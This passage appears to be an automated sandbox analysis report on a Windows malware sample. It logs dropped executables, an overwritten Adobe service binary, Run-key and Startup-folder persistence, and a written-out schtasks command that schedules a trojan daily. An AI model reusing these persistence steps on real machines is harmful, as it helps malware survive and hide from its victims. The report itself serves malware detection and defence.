Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E76946 push 02E769F3h; ret	0_2_02E769EB
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E76948 push 02E769F3h; ret	0_2_02E769EB
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E7790C push 02E77989h; ret	0_2_02E77981
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E75E7C push ecx; mov dword ptr [esp], edx	0_2_02E75E7E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E72F60 push 02E72FD6h; ret	0_2_02E72FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009E0C55 push edi; retf	9_2_009E0C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0306632D push eax; ret	11_2_03066341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_03063A9C push ebx; retf	11_2_03063ADA

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Jump to behavior

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E7AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02E7AB1C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
